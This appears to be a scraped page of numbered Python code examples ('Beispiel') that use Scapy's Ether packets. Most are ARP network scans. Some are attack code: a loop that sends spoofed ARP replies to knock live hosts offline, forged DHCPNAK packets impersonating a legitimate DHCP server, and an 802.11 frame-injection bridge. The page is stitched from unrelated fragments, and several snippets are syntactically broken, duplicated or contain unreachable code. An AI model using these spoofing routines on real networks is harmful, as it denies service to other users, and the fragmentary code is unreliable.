def arping(iprange="10.0.1.0/24"):
    """Arping function takes IP Address or Network, returns nested mac/ip list"""

    conf.verb = 0
    ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=iprange),
                     timeout=2)
    collection = []
    for snd, rcv in ans:
        result = rcv.sprintf(r"%ARP.psrc% %Ether.src%").split()
        collection.append(result)
    return collection
Beispiel #2
0
def nak_request(pkt):
    msg("Spoofing DHCPNAK from " + globals()['dhcp_server_mac'], 2)
    sendp(
        Ether(src=globals()['dhcp_server_mac'], dst=pkt[Ether].dst) /
        IP(src=globals()['dhcp_server_ip'], dst=pkt[IP].dst) /
        UDP(sport=67, dport=68) / BOOTP(op=2,
                                        ciaddr=pkt[IP].src,
                                        siaddr=pkt[IP].dst,
                                        chaddr=pkt[Ether].src,
                                        xid=pkt[BOOTP].xid) /
        DHCP(options=[('server_id', globals()['dhcp_server_ip']),
                      ('message-type', 'nak'), ('end')]))
def arping(iprange="10.0.1.0/24"):
    conf.verb = 0
    ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=iprange),
                     timeout=2)

    collection = []
    for snd, rcv in ans:
        result = rcv.sprintf(r"%ARP.psrc% %Ether.src%").split()
        collection.append(result)
    return collection

    if __name__ == '__main__':
        if len(sys.argv) > 1:
            for ip in sys.argv[1:]:
                print "arping", ip
                print arping(ip)

        else:
            print apring()
Beispiel #4
0
def fisting():
    arp_fist = ARP(pdst=argv[1], op=2)
    print "We are going to loop forever, CTRL-C to stop...\n"
    while True:
        sleep(3)
        for a in arp_fist:
            arping = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=a.pdst)
            ans, unans = srp(arping, timeout=0.1)
            if len(ans) == 1:
                a.psrc = a.pdst
                print a.pdst, "is ALIVE!"
                print "* Time to shut it down!"
                send(a)
                ans2, unans2 = srp(arping, timeout=0.1)
                if len(unans2) == 1:
                    print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
                    print "@@@", a.psrc, "was rubber fisted!"
                    print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
                    sleep(3)
                else:
                    print "FAILED:", a.pdst, "is still alive :-("
            else:
                print a.pdst, "is already DEAD!"
            print
Beispiel #5
0
print "Interface %s created. Configure it and use it" % ifname

# Speed optimization si Scapy does not have to parse payloads
Ether.payload_guess = []
SNAP.payload_guess = []

try:
    while 1:
        r = select([f, s], [], [])[0]

        # frame from /dev/net/tun
        if f in r:

            # tuntap frame max. size is 1522 (ethernet, see RFC3580) + 4
            buf = os.read(f, 1526)
            eth_rcvd_frame = Ether(buf[4:])

            if DEBUG:
                os.write(1, "Received from %s\n" % ifname)
                if VERB:
                    os.write(1, "%s\n" % eth_rcvd_frame.summary())

# Prepare Dot11 frame for injection
            dot11_sent_frame = Dot11(type="Data",
                                     FCfield="from-DS",
                                     addr1=eth_rcvd_frame.getlayer(Ether).dst,
                                     addr2=BSSID)
            # It doesn't seem possible to set tuntap interface MAC address
            # when we create it, so we set source MAC here
            if not HAS_SMAC:
                dot11_sent_frame.addr3 = eth_rcvd_frame.getlayer(Ether).src
Beispiel #6
0
attempted_dhcpnaks = {}

# This array holds the MAC address from DHCP clients which have send a DHCPREQUEST. We use it to
# cross reference it with ARP packets to see from which DHCP server a lease was obtained.
macs = {}


def msg(string, level):
    if globals()['verbose'] >= level:
        print(string)


# Sending a DHCPDISCOVER to aquire the DHCP server IP.
msg("Sending DHCPDISCOVER packet to discover DHCP servers", 2)
sendp(
    Ether(src="00:00:00:00:00:00", dst="ff:ff:ff:ff:ff:ff") /
    IP(src="0.0.0.0", dst="255.255.255.255") / UDP(sport=68, dport=67) /
    BOOTP(chaddr="\x00\x00\x00\x00\x00\x00", xid=0x10000000) /
    DHCP(options=[('message-type', 'discover'), ('end')]))


# Filtering out the DHCP server it's IP address, and storing it in a global variable. We ignore our
# own DHCP server via a bpf filter in the sniff command below.
def get_dhcp_server(pkt):
    if pkt[DHCP] and pkt[DHCP].options[0][1] == 2:
        globals()["dhcp_server_ip"] = pkt[IP].src
        globals()["dhcp_server_mac"] = pkt[Ether].src
        msg("Legit DHCP server found on " + globals()['dhcp_server_ip'], 1)


# Detecting DHCPREQUEST packets and ARP packets.
Beispiel #7
0
 def __call__(self):
     """Get the original scapy packet."""
     pkt = Ether(self.____contents)
     pkt.time = self.____time
     return pkt
Beispiel #8
0
print "Interface %s created. Configure it and use it" % ifname

# Speed optimization si Scapy does not have to parse payloads
Ether.payload_guess=[]
SNAP.payload_guess=[]

try:
    while 1:
        r = select([f,s],[],[])[0]

	# frame from /dev/net/tun
	if f in r:

	    # tuntap frame max. size is 1522 (ethernet, see RFC3580) + 4
	    buf = os.read(f,1526)
            eth_rcvd_frame=Ether(buf[4:])

	    if DEBUG:
	        os.write(1,"Received from %s\n" % ifname)
		if VERB:
		    os.write(1,"%s\n" % eth_rcvd_frame.summary())
	    
	# Prepare Dot11 frame for injection
	    dot11_sent_frame = Dot11(
		type = "Data",
		FCfield = "from-DS",
		addr1 = eth_rcvd_frame.getlayer(Ether).dst,
		addr2 = BSSID)
	# It doesn't seem possible to set tuntap interface MAC address
	# when we create it, so we set source MAC here
	    if not HAS_SMAC:
Beispiel #9
0
#! /usr/bin/env python
# arping2tex : arpings a network and outputs a LaTeX table as result
import sys
if len(sys.argv) != 2:
    print "Usage: arping2tex <net>\n eg: arping2tex 192.168.1.0/24"
    sys.exit(1)
from scapy import srp, Ether, ARP, conf
conf.verb = 0
ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=sys.argv[1]),
                 timeout=2)
print "\\begin{tabular}{|l|l|}"
print "\\hline"
print "MAC & IP\\\\"
print "\\hline"
for s, r in ans:
    print r.sprintf("%Ether.src% & %ARP.psrc%\\\\")
print "\\hline"
print "\end{tabular}"
Beispiel #10
0
from scapy import srp,Ether,ARP,conf

conf.verb=0
ans,unans=srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="10.0.1.1"),
timeout=2)

for snd, rcv in ans:
    print rcv.sprintf(r"%Ether.src% %ARP.psrc%")
Beispiel #11
0
#from scapy.all import srp,Ether,ARP,conf
import sys
from datetime import datetime
try:
    interface = raw_input("enter iface")
    ips = raw
try:
    from scapy import srp,Ether,ARP,conf
except ImportError:
    del scapy
    from scapy import all as scapy
conf.verb = 0
ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff"))/ARP, timeout = 2, iface = interface, inter =0.1

Beispiel #12
0
 def __call__(self):
     """Get the original scapy packet."""
     pkt = Ether(self.____contents)
     pkt.time = self.____time
     return pkt